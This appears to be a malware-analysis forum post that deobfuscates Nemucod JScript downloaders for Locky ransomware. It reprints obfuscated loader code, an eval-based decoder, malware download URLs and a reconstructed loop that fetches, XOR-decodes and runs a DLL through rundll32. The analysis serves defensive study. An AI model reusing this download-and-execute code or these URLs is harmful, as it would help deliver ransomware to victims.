HFw3[233] = 130;
HFw3[226] = 131;
HFw3[47 * 4 + 40] = 1687 - 1555;
HFw3[72 * 3 + 8] = 7628 - 7495;
HFw3[229] = 134;
HFw3[75 * 3 + 6] = 135;
HFw3[234] = 136;
HFw3[235] = 137;
HFw3[232] = 138;
HFw3[239] = 139;
HFw3[238] = 140;
HFw3[69 * 3 + 29] = 141;
HFw3[196] = 142;
HFw3[197] = 143;
HFw3[201] = -1186 + 1330;
HFw3[230] = 145;
HFw3[198] = 8314 - 8168;
HFw3[244] = 5317 - 5170;
HFw3[246] = 148;
HFw3[242] = 149;
HFw3[8816 - 8565] = -1779 + 1929;
HFw3[249] = 151;
HFw3[255] = -145 + 297;
HFw3[214] = 153;
HFw3[92 * 2 + 36] = -7038 + 7192;
HFw3[162] = 155;
HFw3[679 - 516] = 156;
HFw3[165] = 157;
HFw3[8359] = 158;
HFw3[-2719 + 3121] = 159;
HFw3[225] = 160;
HFw3[237] = 161;
HFw3[243] = 162;
HFw3[53 * 4 + 38] = 55 * 2 + 53;
HFw3[241] = 164;
HFw3[209] = 165;
HFw3[170] = 166;
HFw3[186] = 167;
HFw3[191] = 168;
HFw3[11942 - 2966] = 81 + 88;
HFw3[172] = 170;
HFw3[189] = 171;
HFw3[188] = 172;
HFw3[161] = 173;
HFw3[5240 - 5069] = 174;
HFw3[799 - 612] = 175;
HFw3[9617] = 176;
HFw3[13946 - 4328] = 177;
HFw3[15854 - 6235] = 9207 - 9029;
HFw3[9474] = 179;
HFw3[9508] = 180;
HFw3[9569] = 52 * 3 + 25;
HFw3[9570] = 1117 - 935;
HFw3[9558] = 183;
HFw3[9557] = 10 * 18 + 4;
HFw3[9571] = 185;
HFw3[9553] = 186;
HFw3[9559] = 187;
HFw3[9565] = 1929 - 1741;
HFw3[9564] = 189;
HFw3[9563] = 190;
HFw3[9488] = 191;
HFw3[9492] = 192;
HFw3[9524] = 193;
HFw3[11929 - 2413] = 194;
HFw3[9500] = 41 * 4 + 31;
HFw3[9472] = -2762 + 2958;
HFw3[9532] = 1441 - 1244;
HFw3[9566] = -8051 + 8249;
HFw3[14992 - 5425] = 199;
HFw3[9562] = 8 * 25;
HFw3[9556] = 1326 - 1125;
HFw3[9577] = 86 * 2 + 30;
HFw3[9574] = -8592 + 8795;
HFw3[10414 - 846] = 96 * 2 + 12;
HFw3[9552] = 26 * 7 + 23;
HFw3[19345 - 9765] = 206;
HFw3[9575] = 207;
HFw3[7526 + 2050] = 208;
HFw3[9572] = 209;
HFw3[3063 + 6510] = 1488 - 1278;
HFw3[9561] = 211;
HFw3[9560] = 212;
HFw3[9554] = 213;
HFw3[9555] = 214;
HFw3[9579] = 215;
HFw3[4261 * 2 + 1056] = 216;
HFw3[9496] = 217;
HFw3[8068 + 1416] = 218;
HFw3[9608] = 219;
HFw3[9604] = -2198 + 2418;
HFw3[9612] = 221;
HFw3[9616] = 222;
HFw3[10749 - 1149] = 93 * 2 + 37;
HFw3[945] = -3876 + 4100;
HFw3[223] = 4571 - 4346;
HFw3[915] = 226;
HFw3[960] = 227;
HFw3[931] = 7833 - 7605;
HFw3[462 * 2 + 39] = 229;
HFw3[181] = 230;
HFw3[964] = 231;
HFw3[439 * 2 + 56] = 232;
HFw3[920] = 233;
HFw3[3951 - 3014] = 67 * 3 + 33;
HFw3[948] = 235;
HFw3[8734] = 236;
HFw3[966] = -1535 + 1772;
HFw3[949] = 238;
HFw3[8745] = 239;
HFw3[8801] = -7783 + 8023;
HFw3[177] = 241;
HFw3[8805] = 4104 - 3862;
HFw3[8804] = 243;
HFw3[8992] = 81 * 3 + 1;
HFw3[8993] = 245;
HFw3[5715 - 5468] = 246;
HFw3[160 + 8616] = 247;
HFw3[176] = 248;
HFw3[1711 * 5 + 174] = 4708 - 4459;
HFw3[183] = 43 * 5 + 35;
HFw3[8730] = 251;
HFw3[8319] = -4633 + 4885;
HFw3[178] = 253;
HFw3[9632] = 254;
HFw3[4389 - 4229] = 255;
// 9924 - 9924 is 0; Ar5 + DOz + XUy3 is "charCodeAt"; BUj is "push".
var JEc3 = new Array();
for (var OPr3 = 9924 - 9924; OPr3 < MOk3[ZJb + Av]; OPr3++) {
var IBx3 = MOk3[Ar5 + DOz + XUy3](OPr3);
if (IBx3 < 128) {
var Nt5 = IBx3;
} else {
var Nt5 = HFw3[IBx3];
}
JEc3[BUj](Nt5);
};
return JEc3;
};

// Writes a byte array to disk through ADODB.Stream in text mode with Charset "437": St turns the
// bytes into the matching CP437 characters and the stream encodes them back to the raw bytes.
//   IDz0: destination path (the .dll path in the main loop)
//   IGv7: decoded byte array
function OMb(IDz0, IGv7) {

// WScript.CreateObject("ADODB.Stream"); type = DAb4 (2, adTypeText); Charset = MBi0 ("437").
var CJf2 = WScript[MOq + Lf4 + Xf0](Hz + EJz + Vm6 + OPp + Ba1 + ZJo);
CJf2[TGb7] = DAb4;
CJf2[Ci6 + Jw + Nr9] = MBi0;
CJf2[DFa]();
// open(); writeText(St(IGv7)); SaveToFile(IDz0, 2 = overwrite); close()
CJf2[Ia + Zp5](St(IGv7));
CJf2[Cf3 + CKl8 + He + St0](IDz0, 2);
CJf2[Zg0 + Bs5]();
};

// Inverse of IGi2: turns a byte array into a string whose characters are the CP437 glyphs of the
// bytes (values below 128 unchanged, 128..255 mapped through Vi5 to their Unicode code points).
//   IGv7: byte array
// Returns the joined string.
function St(IGv7) {

// Sparse array used as a map: CP437 byte -> Unicode code point, again with arithmetic noise
// (6991 - 6792 = 199 = U+00C7 "Ç" for byte 128, 8902 - 543 = 8359 = U+20A7 for byte 158, ...).
var Vi5 = new Array();
Vi5[128] = 6991 - 6792;
Vi5[129] = 32 * 7 + 28;
Vi5[130] = 233;
Vi5[131] = 226;
Vi5[132] = 228;
Vi5[133] = 224;
Vi5[134] = 4413 - 4184;
Vi5[135] = 231;
Vi5[136] = -6547 + 6781;
Vi5[137] = 235;
Vi5[138] = 1841 - 1609;
Vi5[139] = 239;
Vi5[140] = 4600 - 4362;
Vi5[141] = 236;
Vi5[142] = 196;
Vi5[143] = 197;
Vi5[144] = 14 * 14 + 5;
Vi5[145] = 230;
Vi5[146] = 2664 - 2466;
Vi5[147] = 244;
Vi5[148] = 246;
Vi5[149] = 242;
Vi5[150] = 251;
Vi5[151] = 249;
Vi5[-2390 + 2542] = 255;
Vi5[153] = 19 * 11 + 5;
Vi5[154] = 220;
Vi5[155] = 162;
Vi5[-6579 + 6735] = 163;
Vi5[157] = 165;
Vi5[158] = 8902 - 543;
Vi5[159] = 402;
Vi5[37 * 4 + 12] = 225;
Vi5[18 * 8 + 17] = 237;
Vi5[162] = 243;
Vi5[4639 - 4476] = 250;
Vi5[164] = 241;
Vi5[-8144 + 8309] = 209;
Vi5[166] = 170;
Vi5[167] = 186;
Vi5[168] = 191;
Vi5[169] = 2864 * 3 + 384;
Vi5[170] = -7529 + 7701;
Vi5[171] = 189;
Vi5[23 * 7 + 11] = 188;
Vi5[173] = 161;
Vi5[-7531 + 7705] = 5717 - 5546;
Vi5[8097 - 7922] = 187;
Vi5[176] = 9617;
Vi5[177] = 9618;
Vi5[178] = 9619;
Vi5[9440 - 9261] = 14406 - 4932;
Vi5[180] = 9508;
Vi5[38 * 4 + 29] = 9569;
Vi5[182] = 9570;
Vi5[183] = 2459 + 7099;
Vi5[-2797 + 2981] = 9557;
Vi5[7134 - 6949] = 9571;
Vi5[51 * 3 + 33] = 9553;
Vi5[187] = 2337 + 7222;
Vi5[7339 - 7151] = 2995 + 6570;
Vi5[8 * 23 + 5] = 4289 * 2 + 986;
Vi5[190] = 4443 * 2 + 677;
Vi5[191] = 13066 - 3578;
Vi5[8581 - 8389] = 9492;
Vi5[193] = 9524;
Vi5[-109 + 303] = 9516;
Vi5[195] = 9500;
Vi5[81 * 2 + 34] = 18257 - 8785;
Vi5[197] = 9532;
Vi5[198] = 9566;
Vi5[199] = 9567;
Vi5[200] = 9562;
Vi5[201] = 9556;
Vi5[202] = 9067 + 510;
Vi5[203] = 9574;
Vi5[-6477 + 6681] = 9568;
Vi5[205] = 9552;
Vi5[60 * 3 + 26] = 4780 * 2 + 20;
Vi5[207] = 9575;
Vi5[208] = 9576;
Vi5[7238 - 7029] = 9572;
Vi5[210] = 9573;
Vi5[9163 - 8952] = 9561;
Vi5[6673 - 6461] = 9560;
Vi5[213] = 1621 + 7933;
Vi5[214] = 9555;
Vi5[2756 - 2541] = 9579;
Vi5[216] = 9578;
Vi5[217] = 9496;
Vi5[218] = 9484;
Vi5[219] = 300 + 9308;
Vi5[220] = 9604;
Vi5[90 + 131] = 9612;
Vi5[222] = 6276 + 3340;
Vi5[223] = 9600;
Vi5[224] = 945;
Vi5[225] = 223;
Vi5[226] = 915;
Vi5[227] = 960;
Vi5[9857 - 9629] = 931;
Vi5[10135 - 9906] = 963;
Vi5[104 * 2 + 22] = 181;
Vi5[231] = 964;
Vi5[47 * 4 + 44] = 2933 - 1999;
Vi5[233] = 920;
Vi5[234] = 937;
Vi5[235] = 948;
Vi5[236] = 8734;
Vi5[-2378 + 2615] = 966;
Vi5[238] = 949;
Vi5[6668 - 6429] = 8745;
Vi5[-2938 + 3178] = 8801;
Vi5[241] = -5759 + 5936;
Vi5[93 * 2 + 56] = 8805;
Vi5[6019 - 5776] = 8804;
Vi5[244] = 18481 - 9489;
Vi5[245] = 8993;
Vi5[246] = 247;
Vi5[247] = 1374 + 7402;
Vi5[248] = 176;
Vi5[249] = 8729;
Vi5[250] = 2841 - 2658;
Vi5[251] = 8730;
Vi5[-2317 + 2569] = 8319;
Vi5[253] = 71 * 2 + 36;
Vi5[-6173 + 6427] = 9632;
Vi5[255] = 1237 - 1077;
// Build one character per byte with String.fromCharCode (KPq4 + GUu + FXa9), then join (LCv7).
var Vu = new Array();
var Gn2 = "";
var Nt5;
var IBx3;
for (var OPr3 = 1 * 0; OPr3 < IGv7[ZJb + Av]; OPr3++) {
Nt5 = IGv7[OPr3];
if (Nt5 < 128) {
IBx3 = Nt5;
} else {
IBx3 = Vi5[Nt5];
}
Vu.push(String[KPq4 + GUu + FXa9](IBx3));
}
Gn2 = Vu[LCv7]("");
return Gn2;
};

As usual I modified some parts to avoid copy-paste => save => run => infection :oops:
In bold, the main do..while "infinite" loop (once run, the script keeps trying to download the obfuscated payload until it has been downloaded and deobfuscated successfully, or until the script is stopped)

=> the important parts of the script become easy to read only after replacing the vars with their contents :)

Example :

var LCv7 = "join" + "";
var FXa9 = "Code" + "";
var GUu = "har" + "";
var KPq4 = "fromC" + "";
var XQg1 = "ngth" + "";
var QLf = "le" + "";
var PVc6 = "close" + "";
var UEs = "le" + "";
var Oc = "ToFi" + "";
var Sr = "Save" + "";
var Zp5 = "Text" + "";
var Ia = "write" + "";
var Oy1 = "open" + "";

and later :


var TIk = [LYu + EQm1 + Tp6 + Za + HTq6 + DFt2 + OIy + Gg2 + Ad8 + Ta1, TAh2 + SQk2 + Rf + Hu1 + RHg6 + Tv + LMc + AGi8 + Dq + Dr + Ls4, TAh2 + SQk2 + Ow4 + QSu + Po3 + Ak + YXv5 + MEw1 + Vc2 + TKb3 + NZa2 + VHj4 + Dn5, TAh2 + SQk2 + FAi2 + NHe3 + MQh7 + Cn + IGq + LLy5 + Pu9 + UOz + RHj + Ze8, TAh2 + SQk2 + Hl + AZz + DVp + Zn1 + Ik + QXr + LMc + Td + QNd + Ty + Lc];
var MTm6 = WScript[MOq + Lf4 + Xf0](LSk + Fk + OHb + PVg7 + Tp7);

=> Similar to the previous analysis of nemucod / new Locky as a dll

An obfuscated payload is downloaded by the script, then deobfuscated by several decipher functions (XOR, etc.) to become a real .dll file (older versions used an exe file)

var YZa3 = "%SystemRoot%\\system32\\rundll32.exe" + "";
var ZUi4 = "%SystemRoot%\\SysWOW64\\rundll32.exe" + "";


=> one of them is used to run the dll, depending on the processor architecture


See here for details (with some links to the complete deobfuscated previous version)
https://malwaretips.com/threads/new...rojandownloader-nemucod-asx-26_08_2016.62839/


4) Important parts :


4-1) Connection :

// Excerpt of the connection setup: Zm6 resolves to the two HTTP ProgIDs listed below, and the
// loop keeps the first one CreateObject accepts (break on success, continue on exception).
var Zm6 = [LCo + Bp + Ty0 + IVz + Jm1, Mu + EMb + OJe1 + Yu8 + Sz9 + Nq0 + DFe5];
for (var OPr3 = 0; OPr3 < Zm6[ZJb + Av]; OPr3++) {
try {
var Ma6 = WScript[MOq + Lf4 + Xf0](Zm6[OPr3]);
break;
} catch (e) {
continue;
}
};


We have to replace the vars with their contents to understand it better :)

var Zm6 = [ "MSXML2.XMLHTTP","WinHttp.WinHttpRequest.5.1"]

=> one of these methods is used for the connection (the first one available)

var Ma6 = WScript["CreateObject"](Zm6[index]);​


4-2) URLs

var TIk = [
LYu + EQm1 + Tp6 + Za + HTq6 + DFt2 + OIy + Gg2 + Ad8 + Ta1,
TAh2 + SQk2 + Rf + Hu1 + RHg6 + Tv + LMc + AGi8 + Dq + Dr + Ls4, TAh2 + SQk2 + Ow4 + QSu + Po3 + Ak + YXv5 + MEw1 + Vc2 + TKb3 + NZa2 + VHj4 + Dn5,
TAh2 + SQk2 + FAi2 + NHe3 + MQh7 + Cn + IGq + LLy5 + Pu9 + UOz + RHj + Ze8,
TAh2 + SQk2 + Hl + AZz + DVp + Zn1 + Ik + QXr + LMc + Td + QNd + Ty + Lc​
];​

With replacements :

http ://maydayen.net/e3ib4f
http: //adzebury.com/dsd7gk
http: //duelrid.com/b9m1t
http: //smilehymy.com/f72gngb
http: //smilehymy.com/f72gngb
(not an error from me, it appears twice)


4-3) Payload

var Lp9 = Io + Ri6 + TPc8 + DXl1 + Ag;
var IVi2 = Lp9 + Dc + Ay1;


Io = MTm6.ExpandEnvironmentStrings(Nz + OPo)

Nz + OPo = "%TEMP%/"
var MTm6 = WScript[MOq + Lf4 + Xf0](LSk + Fk + OHb + PVg7 + Tp7);

MOq + Lf4 + Xf0 = "CreateObject"
LSk + Fk + OHb + PVg7 + Tp7 = "WScript.Shell"

Ri6 + TPc8 + DXl1 + Ag = "VfqAQwQEZPrY"

Dc + Ay1 = ".dll"
=> var IVi2 =
"%TEMP%/VfqAQwQEZPrY.dll"

it uses the short path used by programs that require the earlier 8.3 file naming convention.

var Uv = fso.GetFile(IVi2);
var Lj4 = Uv.ShortPath;

=> VFQAQW~1.DLL

run => rundll32.exe %TEMP%\VFQAQW~1.DLL,qwerty 323

qwerty => function called
323 => parameter

New Locky ransomware as dll

5) Main Loop :


var El = "";
var fso = new
ActiveXObject("Scripting.FileSystemObject");
var Em = 0;

var Uw = [18807, 7552, 23965];
var WBe = Uw.slice();

WBe[0] = Math.random() * 29999 | 0;


do {

if (fso.FileExists(dll_file)) {
var oFile = fso.GetFile(dll_file);
var dll_file_short = oFile.
ShortPath;
El = dll_file_short +
".txt"

if (fso.FileExists(El)) {

this[WScript]["quit"](0);
}
}
try {

if (0 == Em) {

var Gr = random(Tab_Urls.length, WBe);
=> first call of their random function, to obfuscate a bit more
=> here it gives a random "good" index to begin the loop in the urls tab :rolleyes:

=> but only because WBe's first value is a random value :)
// Same generator as in the listing above, with the arithmetic noise removed: Wichmann-Hill
// constants, state s mutated in place, so the output is fully determined by the seed.
function random(range, s) {
s[0] = 171 * s[0] % 30269;
s[1] = 172 * s[1] % 30307;
s[2] = 170 * s[2] % 30323;
var r = (s[0] / 30269 + s[1] / 30307 + s[2] / 30323) % 1.0;
return Math.floor(r * range);
}
oHttp.open("GET", Tab_Urls[Gr++ % Tab_Urls.length], false);

oHttp.
send();

while (oHttp.
readystate < 4)) WScript.Sleep(100);
var oStream = WScript.
CreateObject("ADODB.Stream");
oStream.
open();
oStream.
type = 1;
oStream.
write(oHttp.ResponseBody);
oStream.
position = 0;
oStream.
SaveToFile(file , 2);
oStream.
close();

var file_content = ReadTextFromFile_char_substitution_1(file);
file_content = deobfuscation( file_content);

if ( file_content.
length < 102400 || file_content.length > 235520) {
continue;
}

WriteTextToFile_char_substitution_2(dll_file, file_content);
Em = 1;
}

var oFile = fso.
GetFile(dll_file);

var dll_file_short = oFile.
ShortPath;

MTm6.
Run("...rundll32.exe" + " " + dll_file_short + ",qwerty 323");

WScript.
Sleep(20000);
} catch (e) {
WScript.Sleep(1000);

continue;
};
} while (1);

WScript.
Quit(0);


6) Random function - false random :)


// The "random" function with the arithmetic obfuscation removed. The multiplier/modulus pairs
// are the Wichmann-Hill PRNG constants and s is the generator state, updated in place: for a fixed
// seed the sequence is always the same, which is what the XOR decoding relies on.
//   range: upper bound, result lies in [0, range)
//   s:     3-element state array, mutated on every call
function random(range, s) {
s[0] = 171 * s[0] % 30269;
s[1] = 172 * s[1] % 30307;
s[2] = 170 * s[2] % 30323;
var r = (s[0] / 30269 + s[1] / 30307 + s[2] / 30323) % 1.0;
return Math.floor(r * range);
}

it takes two parameters; nothing inside it is actually random :D

First time it is called

var Uw = [18807, 7552, 23965];

var WBe = Uw.slice(); => still [18807, 7552, 23965] :rolleyes:

WBe[0] = Math.random() * 29999 | 0;
=> the real random part: the first value 18807 is replaced by a value between 0 and 29999

var Gr = random(Tab_Urls.length, WBe); => here random depends only on WBe's first value

Second time it is called: the famous XOR part (see previous analysis):

for (var index =0 ; OPr3 < IGv7.length ; index++) {
IGv7[index] ^= random(256, AJf);
}

with AJf = Uw = [18807, 7552, 23965]; => never changes ;)

=> this time, not a random value :)

=> 118
----------------------------------------------------------------------------------------------------
NEXT PART : 4 d7f8c742cd.html (quick because similar to above sample)
----------------------------------------------------------------------------------------------------
 

DardiM

PART 2 : d7f8c742cd.html

1) What it looks like when edited


<job id=1>
<script target="about:blank" language="JScript">

// Stage-1 loader of d7f8c742cd.html (listing elided with "..." by the post author). Same scheme as
// the first sample, but the token list is already an array literal, so no split() is needed.
// With the Bv table below, the first tokens (__Lz __Dr __Yw __Zs __Id __GVj __LGq __Yw __Ss __FWb
// __Gl __DOv __KJn __Sa) read "function e() {\n".
var PWf = ["__Lz", "__Dr", "__Yw", "__Zs", "__Id", "__GVj", "__LGq", "__Yw", "__Ss", "__FWb", "__Gl", "__DOv", "__KJn", "__Sa", "__Ss", "__Ss", "__Ss", "__Ss", "__KYm", "__Zc", "__Xe", "__Ss", "__EHy", "__EMm", "__Nw", "__GVj", "__Ts", "__Dr", "__EFn", "__Qf", "__Lz", "__Dr", "__Nw", "__Id", "__EFn", "__Qf", "__Ss", "__Dh", "__Ss", "__EWd", "__Xm", "__CJk", "__EWd", "__Qv", "__EWd", "__EWd", "__Qv", "__EWd", "__Zs", "__EWd", "__Qv", "__EWd", "__Xe", "__EWd", "__Qv", "__EWd", "__GVj", "__EWd", "__Qv", "__EWd", "__VKf", "__Id", "__EWd", "__ZMl", "__Sa", "__Ss", "__Ss", "__Ss", "__Ss", "__KYm", "__Zc", "__Xe", "__Ss", "__EHy", "__Zs", "__Ss", "__Dh", "__Ss", "__EWd", "__Ee", "__Gk", "__CJk", "__Ts", "__EWd", "__Qv", "__EWd", "__Nw", "__Id", "__EWd", "__Qv", "__EWd", "__EWd", "__Qv", "__EWd", "__FWb", "__PUe", "__EWd", "__Qv", "__EWd", "__AHd", "__LGq", "__LGq", "__Id", "__Ee", "__Gk", "__Ee", "__Ee", "__Nw", "__EWd", "__Qv", "__EWd", "__Ts", "__Nw", "__Id", "__FWb", "__PUe", "__Qz", "__ALu", "__Ee", "__Ee", "__Zs", "__PUe", "__EFn", "__Ig", "__EWd", "__Qv", "__EWd", "__FWb", "__Us", "__EWd",
...
...
"__Dr", "__Ig", "__VKf", "__Dr", "__Nw", "__EMm", "__Gl", "__CJk", "__Id", "__Xe", "__GVj", "__Yw", "__Qf", "__QKo", "__NDw", "__XHb", "__Zs", "__Ss", "__Qv", "__Ss", "__ZQn", "__NDw", "__Nw", "__Ss", "__Qv", "__Ss", "__Ac", "__VKf", "__Nu", "__Gl", "__Ji0", "__XHb", "__Us", "__Qz", "__DOv", "__DOv", "__ZMl", "__CPs", "__Sa", "__Te", "__EAw", "__CPs", "__Sa", "__Te", "__CPs", "__Sa", "__Te", "__GOn", "__Yw", "__ALu", "__Dh", "__SUa", "__Dr", "__QKo", "__SUa", "__Dr", "__Qv0", "__Nu", "__Gl", "__EWd", "__EWd", "__DOv", "__ZMl", "__CPs", "__Sa", "__Te", "__CPs", "__Sa", "__Te", "__Xe", "__FWb", "__Id", "__Dr", "__Xe", "__Yw", "__Ss", "__GOn", "__Yw", "__ALu", "__ZMl", "__CPs", "__Sa", "__EAw", "__ZMl", "__CPs", "__Sa", "__CPs", "__Sa"
];

// HKc accumulates the decoded stage-2 source.
var HKc = "";
// Token -> character table; every value is a comma expression, so (1, "\x0a") is just "\x0a".
// Same character set as the first sample, with different token names.
var Bv = {
"__Sa": (1, "\x0a"),
"__CPs": (1, "\x0d"),
"__DMb": (1, "D"),
"__Vf": (1, "H"),
"__XOq": (1, "L"),
"__Ac": (1, "P"),
"__XRb": (1, "T"),
"__EZe": (1, "X"),
"__Te": (1, "\x09"),
"__EFn": (1, "d"),
"__EMm": (1, "h"),
"__Dt": (1, "l"),
"__VKf": (1, "p"),
"__Id": (1, "t"),
"__EAw": (1, "\x7d"),
"__TLw": (1, "\x7c"),
"__KJn": (1, "\x7b"),
"__MKt": (1, "\x2f"),
"__Uv": (1, "\x2d"),
"__Ig": (1, "\x2e"),
"__Qv": (1, "\x2b"),
"__Jy": (1, "\x2c"),
"__BOo": (1, "\x2a"),
"__ITb": (1, "C"),
"__GOn": (1, "G"),
"__Ja": (1, "K"),
"__NDw": (1, "O"),
"__CJk": (1, "S"),
"__Gk": (1, "\x25"),
"__EWd": (1, "\x22"),
"__Xm": (1, "W"),
"__Us": (1, "x"),
"__Gl": (1, "\x28"),
"__DOv": (1, "\x29"),
"__Zs": (1, "c"),
"__Qf": (1, "g"),
"__VTv": (1, "k"),
"__LGq": (1, "o"),
"__Nw": (1, "s"),
"__NWq": (1, "w"),
"__Ss": (1, "\x20"),
"__Wv": (1, "\x21"),
"__Qv0": (1, "\x31"),
"__OOi": (1, "\x30"),
"__Qz": (1, "\x33"),
"__ALu": (1, "\x32"),
"__VKn": (1, "\x35"),
"__Vq": (1, "\x34"),
"__QMt": (1, "\x37"),
"__TGp": (1, "\x36"),
"__USc": (1, "\x39"),
"__Ji": (1, "\x38"),
"__OVr": (1, "\x3a"),
"__JLr": (1, "\x3c"),
"__ZMl": (1, "\x3b"),
"__If": (1, "\x3e"),
"__Dh": (1, "\x3d"),
"__IBi": (1, "F"),
"__Lp": (1, "J"),
"__ZQn": (1, "N"),
"__AHd": (1, "R"),
"__SUa": (1, "V"),
"__Qz0": (1, "Z"),
"__GYd": (1, "b"),
"__KVw": (1, "\x40"),
"__Lz": (1, "f"),
"__QMz": (1, "j"),
"__Yw": (1, "n"),
"__Xe": (1, "r"),
"__KYm": (1, "v"),
"__GNi": (1, "z"),
"__XHb": (1, "B"),
"__Dr": (1, "u"),
"__FMq": (1, "A"),
"__Bu": (1, "E"),
"__Ji0": (1, "I"),
"__Zb": (1, "M"),
"__ZBl": (1, "Q"),
"__EXd": (1, "U"),
"__CAb": (1, "Y"),
"__Zc": (1, "a"),
"__FWb": (1, "e"),
"__GVj": (1, "i"),
"__PUe": (1, "m"),
"__UGt": (1, "q"),
"__EHy": (1, "\x5f"),
"__At": (1, "\x5e"),
"__Nu": (1, "\x5d"),
"__Ee": (1, "\x5c"),
"__QKo": (1, "\x5b"),
"__Ts": (1, "y")
};
var Wy;
for (Wy = 0; Wy < PWf["l" + "e" + "n" + "gth"]; Wy++) {

XMm = PWf[Wy];
HKc = (43, 35, HKc) + (25, 35, Bv[XMm]);

}
eval(HKc);

</script>
</job>

2) Explanations :

Although it is named .html, this file is a Windows Script Host job (a WSF-style `<job>` wrapper around JScript); that wrapper is the part the first sample did not have:

<job id=1>
<script target="about:blank" language="JScript">
...
...
</script>
</job>
=> this wrapper only makes Windows Script Host run the body with the JScript engine; it plays no part in the obfuscation itself.

The other part looks like the first sample, but less complicated :
=> the first array (PWf) is already written as a literal array of token keys, so there is no split('~') call needed to produce it.

For the rest , same explanation :

for (Wy = 0; Wy < PWf["l" + "e" + "n" + "gth"]; Wy++) {
XMm = PWf[Wy];
HKc = (43, 35, HKc) + (25, 35, Bv[XMm]);
=> HKc = HKc + Bv[XMm];​
}

eval(HKc); => executes the decoded string, i.e. the second stage. To analyse it safely, dump HKc instead of evaluating it (for example replace eval(HKc) with WScript.Echo(HKc), or write it to a file) — and never run the sample outside an isolated VM.

3) What it looks like after first deobfuscation :

It looks like the same as previous sample, with some parts that change :

- var Uw = [21692, 4331, 983];
=> main tab used with different values (normal, for the XOR part, another number is used, not 118)

- URLs parts

- Payload Parts​

4) Important parts :

4-1) Connection :

var Zm6 = [LCo + Bp + Ty0 + IVz + Jm1, Mu + EMb + OJe1 + Yu8 + Sz9 + Nq0 + DFe5];
for (var OPr3 = 0; OPr3 < Zm6[ZJb + Av]; OPr3++) {
try {

var Ma6 = WScript[MOq + Lf4 + Xf0](Zm6[OPr3]);
break;
} catch (e) {
continue;
}
};

We have to substitute each variable with its string value to see what is going on:

var Zm6 = [ "MSXML2.XMLHTTP","WinHttp.WinHttpRequest.5.1"]

=> the loop tries each ProgID in order and keeps the first one CreateObject manages to instantiate (break on success; the catch just moves on to the next). Both give an HTTP client, so the download works with either.

var Ma6 = WScript["CreateObject"](Zm6[index]);

4-2) URLs

var TIk = [
Ed + Zw0 + KTl3 + KFg2 + Rq + KFg2 + Gd5 + FQs + Gn4 + Wt4 + Mo + XSj3 + Mo0 + Sa,
Ed + RAn + Ze1 + Rj + Hj + Za2 + Vq + Wk + Ke + JPy + Vu0 + ROp2,
Ed + Zw0 + Bl4 + GBr2 + AZc + Xz7 + AYc8 + XSq6 + EDr2 + EXd + Oa9 + Vp + Gy50,
Ze + VQk + Rj + Hj + Ag + Oz0 + XSq6 + BYp2 + Gb + Vu0 + ROp2,
Ed + Zw0 + Uu7 + GPw + FOx8 + AUi + OPo + LTv + NGu8 + XNe + Kz9 + Dc​
];

With replacements :

http ://lookbookinghotels.ws/fnectl9i
http ://one4four1.ws/lt94ccs
http ://trybttr.ws/vygvb3zm
http ://one4four1.ws/lt94ccs
http ://one4four1.ws/lt94ccs
(three of the five entries resolve to the same URL — most likely a builder bug, as in the previous sample; it only leaves the script with fewer distinct download sources)


4-3) Payload

var Io = MTm6.ExpandEnvironmentStrings(En2 + QNu);
var Lp9 = Io + IBm7 + Dc0 + FAt8 + IZr;
var IVi2 = Lp9 + En7 + QBp;​


Io = MTm6.ExpandEnvironmentStrings(En2 + QNu)

En2 + QNu = "%TEMP%/"

var MTm6 = WScript[MOq + Lf4 + Xf0](LSk + Fk + OHb + PVg7 + Tp7);

MOq + Lf4 + Xf0 = "CreateObject"
LSk + Fk + OHb + PVg7 + Tp7 = "WScript.Shell"
=> MTm6 = WScript.CreateObject("WScript.Shell")

IBm7 + Dc0 + FAt8 + IZr = "WKeKTuYpXoXjHaWZ"
En7 + QBp = ".dll"

=> var IVi2 = "%TEMP%/WKeKTuYpXoXjHaWZ.dll" (after ExpandEnvironmentStrings, %TEMP% has been replaced by the user's temp directory)

It then asks the FileSystemObject for the 8.3 short form of that path (the ShortPath property — the form used by programs that still require the earlier 8.3 file naming convention):

var Uv = fso.GetFile(IVi2);
var Lj4 = Uv.ShortPath;

=> WKEKTU~1.DLL


run => rundll32.exe %TEMP%\WKEKTU~1.DLL,qwerty 323 (using the short path obtained above)

qwerty => the export that rundll32 is told to call inside the DLL
323 => the argument string passed to that export

=> the payload is a new Locky ransomware build shipped as a DLL, which is why it is launched through rundll32 with an export name instead of being executed directly.

5) Main Loop :

No changes

6) False random function :

// Obfuscated form of the generator: the three multiply-modulo steps use the classic
// Wichmann-Hill constants (171/30269, 172/30307, 170/30323); `s` is the 3-element seed
// array and is updated in place, so every call yields a new value.
function random(range, s) {
s[0] = 171 * s[-6915 + 6915] % 30269; // s[-6915 + 6915] is just s[0]
s[1] = (5745 - 5573) * s[1] % 30307; // 5745 - 5573 = 172
s[2] = 170 * s[2] % 30323;
var r = (s[0] / 30269 + s[4353 - 4352] / 30307 + s[2] / 30323) % 1.0; // s[4353 - 4352] is s[1]; r is in [0, 1)
return Math[OMi0 + Ao4](r * range); // OMi0 + Ao4 resolves to "floor" (see the simplified form below)
}

Simplified :
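// Simplified form of the generator above. The three steps are the classic Wichmann-Hill
// constants (171/30269, 172/30307, 170/30323).
//   range - upper bound (exclusive) of the returned integer
//   s     - 3-element seed array; it is MUTATED in place, so consecutive calls with the
//           same array walk through the generator's sequence
// Returns Math.floor(r * range) with r in [0, 1), i.e. an integer in 0 .. range-1. For
// range = 256 that is one XOR key byte per call (never 256), so the payload is XORed with
// a keystream derived from the seed, not with a single constant.
function random(range, s) {
s[0] = 171 * s[0] % 30269;
s[1] = 172 * s[1] % 30307;
s[2] = 170 * s[2] % 30323;
var r = (s[0] / 30269 + s[1] / 30307 + s[2] / 30323) % 1.0;
return Math.floor(r * range);
}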

var Fm;

var AJf = Uw.slice();

=> [21692, 4331, 983] => s[0] , s[1] and s[2]

=> same random function
=> different values from previous sample for second parameter
=> different integer for the XOR part :D
for (var OPr3 = 6780 - 6780; OPr3 < IGv7[ICc + Rb]; OPr3++) {
IGv7[OPr3] ^= random(256, AJf);
}

=> random(256, AJf) returns Math.floor(r * 256) with r in [0, 1), i.e. a value between 0 and 255 that changes on every call because the seed array AJf is updated in place. The XOR key is therefore a keystream generated from the seed Uw = [21692, 4331, 983], not a single constant (the function can never return 256).

----------------------------------------------------------------------------------------------------
NEXT PART : 2 .js : completely different script, not a nemucod
----------------------------------------------------------------------------------------------------
 
Part 3 : 2.js

1) What it looks like when edited


As usual : I made some modifications to avoid copy-paste => saved => run => infection :p

